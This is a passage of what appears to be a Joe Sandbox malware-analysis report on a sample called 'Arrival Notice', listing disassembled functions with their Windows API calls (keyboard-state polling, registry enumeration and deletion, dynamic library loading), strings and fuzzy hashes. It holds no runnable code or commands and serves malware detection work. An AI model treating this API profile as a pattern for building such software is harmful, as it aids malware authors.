Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8

Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

Strings

ListBox, xrefs: 00469D20
ComboBox, xrefs: 00469CE7

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$_memmove_wcslen
String ID: ComboBox$ListBox
API String ID: 1589278365-1403004172
Opcode ID: d3ab0c5c9dbd55cd2fa387b6395fab58cc4ff0dcf91f6c5d22d862eb4450cbb5
Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
Opcode Fuzzy Hash: d3ab0c5c9dbd55cd2fa387b6395fab58cc4ff0dcf91f6c5d22d862eb4450cbb5
Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6

Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?), ref: 00443472

Strings

nul, xrefs: 004434E8

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5

Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0044337D

Strings

nul, xrefs: 004433F4

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795

Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

_wcsncpy.LIBCMT ref: 00401C41
_wcscpy.LIBCMT ref: 00401C5D
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F

Strings

Line: , xrefs: 0042727B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
String ID: Line:
API String ID: 1874344091-1585850449
Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E

Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

SysAnimate32, xrefs: 00440C91

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID: SysAnimate32
API String ID: 0-1011021900
Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768

Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA

GetFocus.USER32 ref: 0046157B

Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF

GetClassNameW.USER32(?,?,00000100), ref: 004615C4
EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
__swprintf.LIBCMT ref: 00461608

Strings

%s%d, xrefs: 00461602

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
String ID: %s%d
API String ID: 2645982514-1110647743
Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69

Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A

Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?), ref: 0047584D
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
CloseHandle.KERNEL32(00000000), ref: 00475A4D

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96

Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ConnectRegistry_memmove_wcslen
String ID:
API String ID: 15295421-0
Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6

Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
GetProcAddress.KERNEL32(?,?), ref: 004648F7
GetProcAddress.KERNEL32(?,00000000), ref: 00464916
GetProcAddress.KERNEL32(?,?), ref: 0046495A
FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99

Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004563A6
ScreenToClient.USER32(?,?), ref: 004563C3
GetAsyncKeyState.USER32(?), ref: 00456400
GetAsyncKeyState.USER32(?), ref: 00456410
GetWindowLongW.USER32(?,000000F0), ref: 00456466

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: AsyncState$ClientCursorLongScreenWindow
String ID:
API String ID: 3539004672-0
Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68

Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
Sleep.KERNEL32(0000000A), ref: 0047D455
InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID:
API String ID: 327565842-0
Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99

Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54

Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
RegCloseKey.ADVAPI32(?), ref: 00441CFE
RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Enum$CloseDeleteOpen
String ID:
API String ID: 2095303065-0
Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8

Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00436A24

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: RectWindow
String ID:
API String ID: 861336768-0
Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90

Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00449598

Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636

SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
_wcslen.LIBCMT ref: 0044960D
_wcslen.LIBCMT ref: 0044961A
SendMessageW.USER32(?,00001074,?,?), ref: 0044964E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$_wcslen$_wcspbrk
String ID:
API String ID: 1856069659-0
Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
